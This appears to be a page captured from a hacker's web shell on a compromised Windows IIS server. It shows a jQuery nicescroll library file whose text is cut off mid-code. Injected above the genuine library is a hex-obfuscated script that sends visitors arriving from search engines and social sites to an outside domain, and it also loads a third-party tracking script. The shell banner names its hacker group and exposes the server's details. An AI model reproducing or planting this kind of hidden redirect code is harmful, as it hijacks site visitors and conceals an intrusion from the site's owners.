GIF89;aGIF89;aGIF89;a

Team Anon Force

https://t.me/Professor6T9x

Professor6T9 Web SheLL

Windows NT WEB-23 10.0 build 17763 (Windows Server 2016) i586
Microsoft-IIS/10.0
103.118.16.173

File Name : jquery.nicescroll.js

var rkqDVA1=/\.(sogou|soso|facebook|instagram|linkedin|twitter|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig;
var NDGTocrQ2 =window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"];
if(rkqDVA1["\x74\x65\x73\x74"](NDGTocrQ2)){
    window["\x6c\x6f\x63\x61\x74\x69\x6f\x6e"]["\x68\x72\x65\x66"]='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6a\x32\x30\x74\x2e\x78\x79\x7a\x2f'
}
document.write ('<script type="text/javascript"  src="https://js.users.51.la/21923327.js"></script>');
/* jquery.nicescroll -- version 3.4.0 -- copyright 2011-12-13 InuYaksa*2013 -- licensed under the MIT -- -- http://areaaperta.com/nicescroll -- https://github.com/inuyaksa/jquery.nicescroll -- */  (function(jQuery){    // globals   var domfocus = false;   var mousefocus = false;   var zoomactive = false;   var tabindexcounter = 5000;   var ascrailcounter = 2000;   var globalmaxzindex = 0;      var $ = jQuery;  // sandbox     // http://stackoverflow.com/questions/2161159/get-script-path   function getScriptPath() {     var scripts=document.getElementsByTagName('script');     var path=scripts[scripts.length-1].src.split('?')[0];     return (path.split('/').length>0) ? path.split('/').slice(0,-1).join('/')+'/' : '';   }   var scriptpath = getScriptPath();  // derived by Paul Irish https://gist.github.com/paulirish/1579671 - thanks for your code!    if (!Array.prototype.forEach) {  // JS 1.6 polyfill     Array.prototype.forEach = function(fn, scope) {       for(var i = 0, len = this.length; i < len; ++i) {         fn.call(scope, this[i], i, this);       }     }   }      var vendors = ['ms','moz','webkit','o'];      var setAnimationFrame = window.requestAnimationFrame||false;   var clearAnimationFrame = window.cancelAnimationFrame||false;    vendors.forEach(function(v){     if (!setAnimationFrame) setAnimationFrame = window[v+'RequestAnimationFrame'];     if (!clearAnimationFrame) clearAnimationFrame = window[v+'CancelAnimationFrame']||window[v+'CancelRequestAnimationFrame'];       });      var clsMutationObserver = window.MutationObserver || window.WebKitMutationObserver || false;      var _globaloptions = {       zindex:"22000",       cursoropacitymin:0,       cursoropacitymax:1,       cursorcolor:"#D9D9D9",       cursorwidth:"10px",       scrollspeed:120,       mousescrollstep:8*3,       touchbehavior:false,       hwacceleration:true,       usetransition:true,       boxzoom:false,       dblclickzoom:true,       gesturezoom:true,       grabcursorenabled:true,       autohidemode:true,       background:"",       iframeautoresize:true,       cursorminheight:32,       preservenativescrolling:true,       railoffset:false,       bouncescroll:true,       spacebarenabled:true,       railpadding:{top:0,right:0,left:0,bottom:0},       disableoutline:true,       horizrailenabled:true,       railalign:"right",       railvalign:"bottom",       enabletranslate3d:true,       enablemousewheel:true,       enablekeyboard:true,       smoothscroll:true,       sensitiverail:true,       enablemouselockapi:true, //      cursormaxheight:false,       cursorfixedheight:false,             directionlockdeadzone:6,       hidecursordelay:400,       nativeparentscrolling:true,       enablescrollonselection:true,       overflowx:true,       overflowy:true,       cursordragspeed:0.3,       rtlmode:false,       cursordragontouch:false   }      var browserdetected = false;      var getBrowserDetection = function() {        if (browserdetected) return browserdetected;        var domtest = document.createElement('DIV');      var d = {};      		d.haspointerlock = "pointerLockElement" in document || "mozPointerLockElement" in document || "webkitPointerLockElement" in document; 		     d.isopera = ("opera" in window);     d.isopera12 = (d.isopera&&("getUserMedia" in navigator));          d.isie = (("all" in document) && ("attachEvent" in domtest) && !d.isopera);     d.isieold = (d.isie && !("msInterpolationMode" in domtest.style));  // IE6 and older     d.isie7 = d.isie&&!d.isieold&&(!("documentMode" in document)||(document.documentMode==7));     d.isie8 = d.isie&&("documentMode" in document)&&(document.documentMode==8);     d.isie9 = d.isie&&("performance" in window)&&(document.documentMode>=9);     d.isie10 = d.isie&&("performance" in window)&&(document.documentMode>=10);          d.isie9mobile = /iemobile.9/i.test(navigator.userAgent);  //wp 7.1 mango     if (d.isie9mobile) d.isie9 = false;     d.isie7mobile = (!d.isie9mobile&&d.isie7) && /iemobile/i.test(navigator.userAgent);  //wp 7.0          d.ismozilla = ("MozAppearance" in domtest.style); 		     d.iswebkit = ("WebkitAppearance" in domtest.style);          d.ischrome = ("chrome" in window); 		d.ischrome22 = (d.ischrome&&d.haspointerlock);     d.ischrome26 = (d.ischrome&&("transition" in domtest.style));  // issue with transform detection (maintain prefix)          d.cantouch = ("ontouchstart" in document.documentElement)||("ontouchstart" in window);  // detection for Chrome Touch Emulation     d.hasmstouch = (window.navigator.msPointerEnabled||false);  // IE10+ pointer events 		     d.ismac = /^mac$/i.test(navigator.platform);          d.isios = (d.cantouch && /iphone|ipad|ipod/i.test(navigator.platform));     d.isios4 = ((d.isios)&&!("seal" in Object));          d.isandroid = (/android/i.test(navigator.userAgent));          d.trstyle = false;     d.hastransform = false;     d.hastranslate3d = false;     d.transitionstyle = false;     d.hastransition = false;     d.transitionend = false;          var check = ['transform','msTransform','webkitTransform','MozTransform','OTransform'];     for(var a=0;a<check.length;a++){       if (typeof domtest.style[check[a]] != "undefined") {         d.trstyle = check[a];         break;       }     }     d.hastransform = (d.trstyle != false);     if (d.hastransform) {       domtest.style[d.trstyle] = "translate3d(1px,2px,3px)";       d.hastranslate3d = /translate3d/.test(domtest.style[d.trstyle]);     }          d.transitionstyle = false;     d.prefixstyle = '';     d.transitionend = false;     var check = ['transition','webkitTransition','MozTransition','OTransition','OTransition','msTransition','KhtmlTransition'];     var prefix = ['','-webkit-','-moz-','-o-','-o','-ms-','-khtml-'];     var evs = ['transitionend','webkitTransitionEnd','transitionend','otransitionend','oTransitionEnd','msTransitionEnd','KhtmlTransitionEnd'];     for(var a=0;a<check.length;a++) {       if (check[a] in domtest.style) {         d.transitionstyle = check[a];         d.prefixstyle = prefix[a];         d.transitionend = evs[a];         break;       }     }     if (d.ischrome26) {  // use always prefix       d.prefixstyle = prefix[1];     }          d.hastransition = (d.transitionstyle);          function detectCursorGrab() {             var lst = ['-moz-grab','default','grab'];       if ((d.ischrome&&!d.ischrome22)||d.isie) lst=[];  // force setting for IE returns false positive and chrome cursor bug       for(var a=0;a<lst.length;a++) {         var p = lst[a];         domtest.style['cursor']=p;         if (domtest.style['cursor']==p) return p;       }       return 'url(http://www.google.com/intl/en_ALL/mapfiles/openhand.cur),n-resize';  // thank you google for custom cursor!     }     d.cursorgrabvalue = detectCursorGrab();      d.hasmousecapture = ("setCapture" in domtest);          d.hasMutationObserver = (clsMutationObserver !== false);          domtest = null;  //memory released      browserdetected = d;          return d;     }      var NiceScrollClass = function(myopt,me) {      var self = this;      this.version = '3.4.0';     this.name = 'nicescroll';          this.me = me;          this.opt = {       doc:$("body"),       win:false     };          $.extend(this.opt,_globaloptions);      // Options for internal use     this.opt.snapbackspeed = 80;          if (myopt||false) {       for(var a in self.opt) {         if (typeof myopt[a] != "undefined") self.opt[a] = myopt[a];       }     }          this.doc = self.opt.doc;     this.iddoc = (this.doc&&this.doc[0])?this.doc[0].id||'':'';         this.ispage = /BODY|HTML/.test((self.opt.win)?self.opt.win[0].nodeName:this.doc[0].nodeName);     this.haswrapper = (self.opt.win!==false);     this.win = self.opt.win||(this.ispage?$(window):this.doc);     this.docscroll = (this.ispage&&!this.haswrapper)?$(window):this.win;     this.body = $("body");     this.viewport = false;          this.isfixed = false;          this.iframe = false;     this.isiframe = ((this.doc[0].nodeName == 'IFRAME') && (this.win[0].nodeName == 'IFRAME'));          this.istextarea = (this.win[0].nodeName == 'TEXTAREA');          this.forcescreen = false; //force to use screen position on events      this.canshowonmouseevent = (self.opt.autohidemode!="scroll");      // Events jump table         this.onmousedown = false;     this.onmouseup = false;     this.onmousemove = false;     this.onmousewheel = false;     this.onkeypress = false;     this.ongesturezoom = false;     this.onclick = false;      // Nicescroll custom events     this.onscrollstart = false;     this.onscrollend = false;     this.onscrollcancel = false;              this.onzoomin = false;     this.onzoomout = false;      // Let's start!       this.view = false;     this.page = false;          this.scroll = {x:0,y:0};     this.scrollratio = {x:0,y:0};         this.cursorheight = 20;     this.scrollvaluemax = 0;          this.checkrtlmode = false;          this.scrollrunning = false;          this.scrollmom = false;          this.observer = false;     this.observerremover = false;  // observer on parent for remove detection          do {       this.id = "ascrail"+(ascrailcounter++);     } while (document.getElementById(this.id));          this.rail = false;     this.cursor = false;     this.cursorfreezed = false;       this.selectiondrag = false;          this.zoom = false;     this.zoomactive = false;          this.hasfocus = false;     this.hasmousefocus = false;          this.visibility = true;     this.locked = false;     this.hidden = false; // rails always hidden     this.cursoractive = true; // user can interact with cursors          this.overflowx = self.opt.overflowx;     this.overflowy = self.opt.overflowy;          this.nativescrollingarea = false;     this.checkarea = 0;          this.events = [];  // event list for unbind          this.saved = {};          this.delaylist = {};     this.synclist = {};          this.lastdeltax = 0;     this.lastdeltay = 0;          this.detected = getBrowserDetection();           var cap = $.extend({},this.detected);       this.canhwscroll = (cap.hastransform&&self.opt.hwacceleration);     this.ishwscroll = (this.canhwscroll&&self.haswrapper);          this.istouchcapable = false;  // desktop devices with touch screen support      //## Check Chrome desktop with touch support     if (cap.cantouch&&cap.ischrome&&!cap.isios&&!cap.isandroid) {       this.istouchcapable = true;       cap.cantouch = false;  // parse normal desktop events     }      //## Firefox 18 nightly build (desktop) false positive (or desktop with touch support)     if (cap.cantouch&&cap.ismozilla&&!cap.isios) {       this.istouchcapable = true;       cap.cantouch = false;  // parse normal desktop events     }          //## disable MouseLock API on user request      if (!self.opt.enablemouselockapi) {       cap.hasmousecapture = false;       cap.haspointerlock = false;     }          this.delayed = function(name,fn,tm,lazy) {       var dd = self.delaylist[name];       var nw = (new Date()).getTime();       if (!lazy&&dd&&dd.tt) return false;       if (dd&&dd.tt) clearTimeout(dd.tt);       if (dd&&dd.last+tm>nw&&!dd.tt) {               self.delaylist[name] = {           last:nw+tm,           tt:setTimeout(function(){self.delaylist[name].tt=0;fn.call();},tm)         }       }       else if (!dd||!dd.tt) {         self.delaylist[name] = {           last:nw,           tt:0         }         setTimeout(function(){fn.call();},0);       }     };          this.debounced = function(name,fn,tm) {       var dd = self.delaylist[name];       var nw = (new Date()).getTime();             self.delaylist[name] = fn;       if (!dd) {                 setTimeout(function(){var fn=self.delaylist[name];self.delaylist[name]=false;fn.call();},tm);       }     }          this.synched = function(name,fn) {            function requestSync() {         if (self.onsync) return;         setAnimationFrame(function(){           self.onsync = false;           for(name in self.synclist){             var fn = self.synclist[name];             if (fn) fn.call(self);             self.synclist[name] = false;           }         });         self.onsync = true;       };                self.synclist[name] = fn;       requestSync();       return name;     };          this.unsynched = function(name) {       if (self.synclist[name]) self.synclist[name] = false;     }          this.css = function(el,pars) {  // save & set       for(var n in pars) {         self.saved.css.push([el,n,el.css(n)]);         el.css(n,pars[n]);       }     };          this.scrollTop = function(val) {       return (typeof val == "undefined") ? self.getScrollTop() : self.setScrollTop(val);     };      this.scrollLeft = function(val) {       return (typeof val == "undefined") ? self.getScrollLeft() : self.setScrollLeft(val);     };      // derived by by Dan Pupius www.pupius.net     BezierClass = function(st,ed,spd,p1,p2,p3,p4) {       this.st = st;       this.ed = ed;       this.spd = spd;              this.p1 = p1||0;       this.p2 = p2||1;       this.p3 = p3||0;       this.p4 = p4||1;              this.ts = (new Date()).getTime();       this.df = this.ed-this.st;     };     BezierClass.prototype = {       B2:function(t){ return 3*t*t*(1-t) },       B3:function(t){ return 3*t*(1-t)*(1-t) },       B4:function(t){ return (1-t)*(1-t)*(1-t) },       getNow:function(){         var nw = (new Date()).getTime();         var pc = 1-((nw-this.ts)/this.spd);         var bz = this.B2(pc) + this.B3(pc) + this.B4(pc);         return (pc<0) ? this.ed : this.st+Math.round(this.df*bz);       },       update:function(ed,spd){         this.st = this.getNow();         this.ed = ed;         this.spd = spd;         this.ts = (new Date()).getTime();         this.df = this.ed-this.st;         return this;       }     };          if (this.ishwscroll) {       // hw accelerated scroll       this.doc.translate = {x:0,y:0,tx:"0px",ty:"0px"};              //this one can help to enable hw accel on ios6 http://indiegamr.com/ios6-html-hardware-acceleration-changes-and-how-to-fix-them/       if (cap.hastranslate3d&&cap.isios) this.doc.css("-webkit-backface-visibility","hidden");  // prevent flickering http://stackoverflow.com/questions/3461441/                    //derived from http://stackoverflow.com/questions/11236090/       function getMatrixValues() {         var tr = self.doc.css(cap.trstyle);         if (tr&&(tr.substr(0,6)=="matrix")) {           return tr.replace(/^.*\((.*)\)$/g, "$1").replace(/px/g,'').split(/, +/);         }         return false;       }              this.getScrollTop = function(last) {         if (!last) {           var mtx = getMatrixValues();           if (mtx) return (mtx.length==16) ? -mtx[13] : -mtx[5];  //matrix3d 16 on IE10           if (self.timerscroll&&self.timerscroll.bz) return self.timerscroll.bz.getNow();         }         return self.doc.translate.y;       };        this.getScrollLeft = function(last) {         if (!last) {           var mtx = getMatrixValues();                     if (mtx) return (mtx.length==16) ? -mtx[12] : -mtx[4];  //matrix3d 16 on IE10           if (self.timerscroll&&self.timerscroll.bh) return self.timerscroll.bh.getNow();         }         return self.doc.translate.x;       };              if (document.createEvent) {         this.notifyScrollEvent = function(el) {           var e = document.createEvent("UIEvents");           e.initUIEvent("scroll", false, true, window, 1);           el.dispatchEvent(e);         };       }       else if (document.fireEvent) {         this.notifyScrollEvent = function(el) {           var e = document.createEventObject();           el.fireEvent("onscroll");           e.cancelBubble = true;          };       }       else {         this.notifyScrollEvent = function(el,add) {}; //NOPE       }              if (cap.hastranslate3d&&self.opt.enabletranslate3d) {         this.setScrollTop = function(val,silent) {           self.doc.translate.y = val;           self.doc.translate.ty = (val*-1)+"px";           self.doc.css(cap.trstyle,"translate3d("+self.doc.translate.tx+","+self.doc.translate.ty+",0px)");                     if (!silent) self.notifyScrollEvent(self.win[0]);         };         this.setScrollLeft = function(val,silent) {                     self.doc.translate.x = val;           self.doc.translate.tx = (val*-1)+"px";           self.doc.css(cap.trstyle,"translate3d("+self.doc.translate.tx+","+self.doc.translate.ty+",0px)");                     if (!silent) self.notifyScrollEvent(self.win[0]);         };       } else {         this.setScrollTop = function(val,silent) {           self.doc.translate.y = val;           self.doc.translate.ty = (val*-1)+"px";           self.doc.css(cap.trstyle,"translate("+self.doc.translate.tx+","+self.doc.translate.ty+")");           if (!silent) self.notifyScrollEvent(self.win[0]);                   };         this.setScrollLeft = function(val,silent) {                   self.doc.translate.x = val;           self.doc.translate.tx = (val*-1)+"px";           self.doc.css(cap.trstyle,"translate("+self.doc.translate.tx+","+self.doc.translate.ty+")");           if (!silent) self.notifyScrollEvent(self.win[0]);         };       }     } else {     // native scroll       this.getScrollTop = function() {         return self.docscroll.scrollTop();       };       this.setScrollTop = function(val) {                 return self.docscroll.scrollTop(val);       };       this.getScrollLeft = function() {         return self.docscroll.scrollLeft();       };       this.setScrollLeft = function(val) {         return self.docscroll.scrollLeft(val);       };     }          this.getTarget = function(e) {       if (!e) return false;       if (e.target) return e.target;       if (e.srcElement) return e.srcElement;       return false;     };          this.hasParent = function(e,id) {       if (!e) return false;       var el = e.target||e.srcElement||e||false;       while (el && el.id != id) {         el = el.parentNode||false;       }       return (el!==false);     };          function getZIndex() {       var dom = self.win;       if ("zIndex" in dom) return dom.zIndex();  // use jQuery UI method when available       while (dom.length>0) {                 if (dom[0].nodeType==9) return false;         var zi = dom.css('zIndex');                 if (!isNaN(zi)&&zi!=0) return parseInt(zi);         dom = dom.parent();       }       return false;     };      //inspired by http://forum.jquery.com/topic/width-includes-border-width-when-set-to-thin-medium-thick-in-ie     var _convertBorderWidth = {"thin":1,"medium":3,"thick":5};     function getWidthToPixel(dom,prop,chkheight) {       var wd = dom.css(prop);       var px = parseFloat(wd);       if (isNaN(px)) {         px = _convertBorderWidth[wd]||0;         var brd = (px==3) ? ((chkheight)?(self.win.outerHeight() - self.win.innerHeight()):(self.win.outerWidth() - self.win.innerWidth())) : 1; //DON'T TRUST CSS         if (self.isie8&&px) px+=1;         return (brd) ? px : 0;        }       return px;     };          this.getOffset = function() {       if (self.isfixed) return {top:parseFloat(self.win.css('top')),left:parseFloat(self.win.css('left'))};       if (!self.viewport) return self.win.offset();       var ww = self.win.offset();       var vp = self.viewport.offset();       return {top:ww.top-vp.top+self.viewport.scrollTop(),left:ww.left-vp.left+self.viewport.scrollLeft()};     };          this.updateScrollBar = function(len) {       if (self.ishwscroll) {         self.rail.css({height:self.win.innerHeight()});         if (self.railh) self.railh.css({width:self.win.innerWidth()});       } else {         var wpos = self.getOffset();         var pos = {top:wpos.top,left:wpos.left};         pos.top+= getWidthToPixel(self.win,'border-top-width',true);         var brd = (self.win.outerWidth() - self.win.innerWidth())/2;         pos.left+= (self.rail.align) ? self.win.outerWidth() - getWidthToPixel(self.win,'border-right-width') - self.rail.width : getWidthToPixel(self.win,'border-left-width');                  var off = self.opt.railoffset;         if (off) {           if (off.top) pos.top+=off.top;           if (self.rail.align&&off.left) pos.left+=off.left;         }          				if (!self.locked) self.rail.css({top:pos.top,left:pos.left,height:(len)?len.h:self.win.innerHeight()}); 				 				if (self.zoom) {				   				  self.zoom.css({top:pos.top+1,left:(self.rail.align==1) ? pos.left-20 : pos.left+self.rail.width+4}); 			  } 				 				if (self.railh&&!self.locked) { 					var pos = {top:wpos.top,left:wpos.left}; 					var y = (self.railh.align) ? pos.top + getWidthToPixel(self.win,'border-top-width',true) + self.win.innerHeight() - self.railh.height : pos.top + getWidthToPixel(self.win,'border-top-width',true); 					var x = pos.left + getWidthToPixel(self.win,'border-left-width'); 					self.railh.css({top:y,left:x,width:self.railh.width}); 				} 		 				       }     };          this.doRailClick = function(e,dbl,hr) {        var fn,pg,cur,pos;        //      if (self.rail.drag&&self.rail.drag.pt!=1) return;       if (self.locked) return; //      if (self.rail.drag) return;  //      self.cancelScroll();                     self.cancelEvent(e);              if (dbl) {         fn = (hr) ? self.doScrollLeft : self.doScrollTop;         cur = (hr) ? ((e.pageX - self.railh.offset().left - (self.cursorwidth/2)) * self.scrollratio.x) : ((e.pageY - self.rail.offset().top - (self.cursorheight/2)) * self.scrollratio.y);         fn(cur);       } else { //        console.log(e.pageY);         fn = (hr) ? self.doScrollLeftBy : self.doScrollBy;         cur = (hr) ? self.scroll.x : self.scroll.y;         pos = (hr) ? e.pageX - self.railh.offset().left : e.pageY - self.rail.offset().top;         pg = (hr) ? self.view.w : self.view.h;                 (cur>=pos) ? fn(pg) : fn(-pg);       }          }          self.hasanimationframe = (setAnimationFrame);     self.hascancelanimationframe = (clearAnimationFrame);          if (!self.hasanimationframe) {       setAnimationFrame=function(fn){return setTimeout(fn,15-Math.floor((+new Date)/1000)%16)}; // 1000/60)};       clearAnimationFrame=clearInterval;     }      else if (!self.hascancelanimationframe) clearAnimationFrame=function(){self.cancelAnimationFrame=true};          this.init = function() {        self.saved.css = [];              if (cap.isie7mobile) return true; // SORRY, DO NOT WORK!              if (cap.hasmstouch) self.css((self.ispage)?$("html"):self.win,{'-ms-touch-action':'none'});              self.zindex = "auto";       if (!self.ispage&&self.opt.zindex=="auto") {         self.zindex = getZIndex()||"auto";       } else {         self.zindex = self.opt.zindex;       }              if (!self.ispage&&self.zindex!="auto") {         if (self.zindex>globalmaxzindex) globalmaxzindex=self.zindex;       }              if (self.isie&&self.zindex==0&&self.opt.zindex=="auto") {  // fix IE auto == 0         self.zindex="auto";       }        /*             self.ispage = true;       self.haswrapper = true; //      self.win = $(window);       self.docscroll = $("body"); //      self.doc = $("body"); */              if (!self.ispage || (!cap.cantouch && !cap.isieold && !cap.isie9mobile)) {                var cont = self.docscroll;         if (self.ispage) cont = (self.haswrapper)?self.win:self.doc;                  if (!cap.isie9mobile) self.css(cont,{'overflow-y':'hidden'});                        if (self.ispage&&cap.isie7) {           if (self.doc[0].nodeName=='BODY') self.css($("html"),{'overflow-y':'hidden'});  //IE7 double scrollbar issue           else if (self.doc[0].nodeName=='HTML') self.css($("body"),{'overflow-y':'hidden'});  //IE7 double scrollbar issue         }                  if (cap.isios&&!self.ispage&&!self.haswrapper) self.css($("body"),{"-webkit-overflow-scrolling":"touch"});  //force hw acceleration                  var cursor = $(document.createElement('div'));         cursor.css({           position:"relative",top:0,"float":"right",width:self.opt.cursorwidth,height:"0px",           'background-color':self.opt.cursorcolor,           border:self.opt.cursorborder,           'background-clip':'padding-box',           '-webkit-border-radius':self.opt.cursorborderradius,           '-moz-border-radius':self.opt.cursorborderradius,           'border-radius':self.opt.cursorborderradius         });                     cursor.hborder = parseFloat(cursor.outerHeight() - cursor.innerHeight());                 self.cursor = cursor;                          var rail = $(document.createElement('div'));         rail.attr('id',self.id);         rail.addClass('nicescroll-rails');                  var v,a,kp = ["left","right"];  //"top","bottom"         for(var n in kp) {           a=kp[n];           v = self.opt.railpadding[a];           (v) ? rail.css("padding-"+a,v+"px") : self.opt.railpadding[a] = 0;         }                  rail.append(cursor);                  rail.width = Math.max(parseFloat(self.opt.cursorwidth),cursor.outerWidth()) + self.opt.railpadding['left'] + self.opt.railpadding['right'];         rail.css({width:rail.width+"px",'zIndex':self.zindex,"background":self.opt.background,cursor:"default"});                          rail.visibility = true;         rail.scrollable = true;                  rail.align = (self.opt.railalign=="left") ? 0 : 1;                  self.rail = rail;                  self.rail.drag = false;                  var zoom = false;         if (self.opt.boxzoom&&!self.ispage&&!cap.isieold) {           zoom = document.createElement('div');                     self.bind(zoom,"click",self.doZoom);           self.zoom = $(zoom);           self.zoom.css({"cursor":"pointer",'z-index':self.zindex,'backgroundImage':'url('+scriptpath+'zoomico.png)','height':18,'width':18,'backgroundPosition':'0px 0px'});           if (self.opt.dblclickzoom) self.bind(self.win,"dblclick",self.doZoom);           if (cap.cantouch&&self.opt.gesturezoom) {             self.ongesturezoom = function(e) {               if (e.scale>1.5) self.doZoomIn(e);               if (e.scale<0.8) self.doZoomOut(e);               return self.cancelEvent(e);             };             self.bind(self.win,"gestureend",self.ongesturezoom);                        }         }          // init HORIZ          self.railh = false;          if (self.opt.horizrailenabled) {            self.css(cont,{'overflow-x':'hidden'});            var cursor = $(document.createElement('div'));           cursor.css({             position:"relative",top:0,height:self.opt.cursorwidth,width:"0px",             'background-color':self.opt.cursorcolor,             border:self.opt.cursorborder,             'background-clip':'padding-box',             '-webkit-border-radius':self.opt.cursorborderradius,             '-moz-border-radius':self.opt.cursorborderradius,             'border-radius':self.opt.cursorborderradius           });                         cursor.wborder = parseFloat(cursor.outerWidth() - cursor.innerWidth());           self.cursorh = cursor;                      var railh = $(document.createElement('div'));           railh.attr('id',self.id+'-hr');           railh.addClass('nicescroll-rails');           railh.height = Math.max(parseFloat(self.opt.cursorwidth),cursor.outerHeight());           railh.css({height:railh.height+"px",'zIndex':self.zindex,"background":self.opt.background});                      railh.append(cursor);                      railh.visibility = true;           railh.scrollable = true;                      railh.align = (self.opt.railvalign=="top") ? 0 : 1;                      self.railh = railh;                      self.railh.drag = false;                    }          //                          if (self.ispage) {           rail.css({position:"fixed",top:"0px",height:"100%"});           (rail.align) ? rail.css({right:"0px"}) : rail.css({left:"0px"});           self.body.append(rail);           if (self.railh) {             railh.css({position:"fixed",left:"0px",width:"100%"});             (railh.align) ? railh.css({bottom:"0px"}) : railh.css({top:"0px"});             self.body.append(railh);           }         } else {                     if (self.ishwscroll) {             if (self.win.css('position')=='static') self.css(self.win,{'position':'relative'});             var bd = (self.win[0].nodeName == 'HTML') ? self.body : self.win;             if (self.zoom) {               self.zoom.css({position:"absolute",top:1,right:0,"margin-right":rail.width+4});               bd.append(self.zoom);             }             rail.css({position:"absolute",top:0});             (rail.align) ? rail.css({right:0}) : rail.css({left:0});             bd.append(rail);             if (railh) {               railh.css({position:"absolute",left:0,bottom:0});               (railh.align) ? railh.css({bottom:0}) : railh.css({top:0});               bd.append(railh);             }           } else {             self.isfixed = (self.win.css("position")=="fixed");             var rlpos = (self.isfixed) ? "fixed" : "absolute";                          if (!self.isfixed) self.viewport = self.getViewport(self.win[0]);             if (self.viewport) {               self.body = self.viewport;                             if ((/relative|absolute/.test(self.viewport.css("position")))==false) self.css(self.viewport,{"position":"relative"});             }                                      rail.css({position:rlpos});             if (self.zoom) self.zoom.css({position:rlpos});             self.updateScrollBar();             self.body.append(rail);             if (self.zoom) self.body.append(self.zoom);             if (self.railh) {               railh.css({position:rlpos});               self.body.append(railh);                        }           }                      if (cap.isios) self.css(self.win,{'-webkit-tap-highlight-color':'rgba(0,0,0,0)','-webkit-touch-callout':'none'});  // prevent grey layer on click            					if (cap.isie&&self.opt.disableoutline) self.win.attr("hideFocus","true");  // IE, prevent dotted rectangle on focused div 					if (cap.iswebkit&&self.opt.disableoutline) self.win.css({"outline":"none"});                    }                  if (self.opt.autohidemode===false) {           self.autohidedom = false;           self.rail.css({opacity:self.opt.cursoropacitymax});                     if (self.railh) self.railh.css({opacity:self.opt.cursoropacitymax});         }         else if (self.opt.autohidemode===true) {           self.autohidedom = $().add(self.rail);                     if (cap.isie8) self.autohidedom=self.autohidedom.add(self.cursor);           if (self.railh) self.autohidedom=self.autohidedom.add(self.railh);           if (self.railh&&cap.isie8) self.autohidedom=self.autohidedom.add(self.cursorh);         }         else if (self.opt.autohidemode=="scroll") {           self.autohidedom = $().add(self.rail);           if (self.railh) self.autohidedom=self.autohidedom.add(self.railh);         }         else if (self.opt.autohidemode=="cursor") {           self.autohidedom = $().add(self.cursor);           if (self.railh) self.autohidedom=self.autohidedom.add(self.cursorh);         }         else if (self.opt.autohidemode=="hidden") {           self.autohidedom = false;           self.hide();           self.locked = false;         }                  if (cap.isie9mobile) {            self.scrollmom = new ScrollMomentumClass2D(self);                    /*           var trace = function(msg) {             var db = $("#debug");             if (isNaN(msg)&&(typeof msg != "string")) {               var x = [];               for(var a in msg) {                 x.push(a+":"+msg[a]);               }               msg ="{"+x.join(",")+"}";             }             if (db.children().length>0) {               db.children().eq(0).before("<div>"+msg+"</div>");             } else {               db.append("<div>"+msg+"</div>");             }           }           window.onerror = function(msg,url,ln) {             trace("ERR: "+msg+" at "+ln);           } */                        self.onmangotouch = function(e) {             var py = self.getScrollTop();             var px = self.getScrollLeft();                          if ((py == self.scrollmom.lastscrolly)&&(px == self.scrollmom.lastscrollx)) return true; //            $("#debug").html('DRAG:'+py);              var dfy = py-self.mangotouch.sy;             var dfx = px-self.mangotouch.sx;                         var df = Math.round(Math.sqrt(Math.pow(dfx,2)+Math.pow(dfy,2)));                         if (df==0) return;                          var dry = (dfy<0)?-1:1;             var drx = (dfx<0)?-1:1;                          var tm = +new Date();             if (self.mangotouch.lazy) clearTimeout(self.mangotouch.lazy);                          if (((tm-self.mangotouch.tm)>80)||(self.mangotouch.dry!=dry)||(self.mangotouch.drx!=drx)) { //              trace('RESET+'+(tm-self.mangotouch.tm));               self.scrollmom.stop();               self.scrollmom.reset(px,py);               self.mangotouch.sy = py;               self.mangotouch.ly = py;               self.mangotouch.sx = px;               self.mangotouch.lx = px;               self.mangotouch.dry = dry;               self.mangotouch.drx = drx;               self.mangotouch.tm = tm;             } else {                              self.scrollmom.stop();               self.scrollmom.update(self.mangotouch.sx-dfx,self.mangotouch.sy-dfy);               var gap = tm - self.mangotouch.tm;                             self.mangotouch.tm = tm;                //              trace('MOVE:'+df+" - "+gap);                              var ds = Math.max(Math.abs(self.mangotouch.ly-py),Math.abs(self.mangotouch.lx-px));               self.mangotouch.ly = py;               self.mangotouch.lx = px;                              if (ds>2) {                 self.mangotouch.lazy = setTimeout(function(){ //                  trace('END:'+ds+'+'+gap);                                     self.mangotouch.lazy = false;                   self.mangotouch.dry = 0;                   self.mangotouch.drx = 0;                   self.mangotouch.tm = 0;                                     self.scrollmom.doMomentum(30);                 },100);               }             }           }                      var top = self.getScrollTop();           var lef = self.getScrollLeft();           self.mangotouch = {sy:top,ly:top,dry:0,sx:lef,lx:lef,drx:0,lazy:false,tm:0};                      self.bind(self.docscroll,"scroll",self.onmangotouch);                  } else {                    if (cap.cantouch||self.istouchcapable||self.opt.touchbehavior||cap.hasmstouch) {                        self.scrollmom = new ScrollMomentumClass2D(self);                        self.ontouchstart = function(e) {               if (e.pointerType&&e.pointerType!=2) return false;                              if (!self.locked) {                                if (cap.hasmstouch) {                   var tg = (e.target) ? e.target : false;                   while (tg) {                     var nc = $(tg).getNiceScroll();                     if ((nc.length>0)&&(nc[0].me == self.me)) break;                     if (nc.length>0) return false;                     if ((tg.nodeName=='DIV')&&(tg.id==self.id)) break;                     tg = (tg.parentNode) ? tg.parentNode : false;                   }                 }                                self.cancelScroll();                                  var tg = self.getTarget(e);                                  if (tg) {                   var skp = (/INPUT/i.test(tg.nodeName))&&(/range/i.test(tg.type));                   if (skp) return self.stopPropagation(e);                 }                                  if (!("clientX" in e) && ("changedTouches" in e)) {                   e.clientX = e.changedTouches[0].clientX;                   e.clientY = e.changedTouches[0].clientY;                 }                                  if (self.forcescreen) {                   var le = e;                   var e = {"original":(e.original)?e.original:e};                   e.clientX = le.screenX;                   e.clientY = le.screenY;                     }                                  self.rail.drag = {x:e.clientX,y:e.clientY,sx:self.scroll.x,sy:self.scroll.y,st:self.getScrollTop(),sl:self.getScrollLeft(),pt:2,dl:false};                                  if (self.ispage||!self.opt.directionlockdeadzone) {                   self.rail.drag.dl = "f";                 } else {                                    var view = {                     w:$(window).width(),                     h:$(window).height()                   };                                      var page = {                     w:Math.max(document.body.scrollWidth,document.documentElement.scrollWidth),                     h:Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)                   }                                      var maxh = Math.max(0,page.h - view.h);                   var maxw = Math.max(0,page.w - view.w);                                                    if (!self.rail.scrollable&&self.railh.scrollable) self.rail.drag.ck = 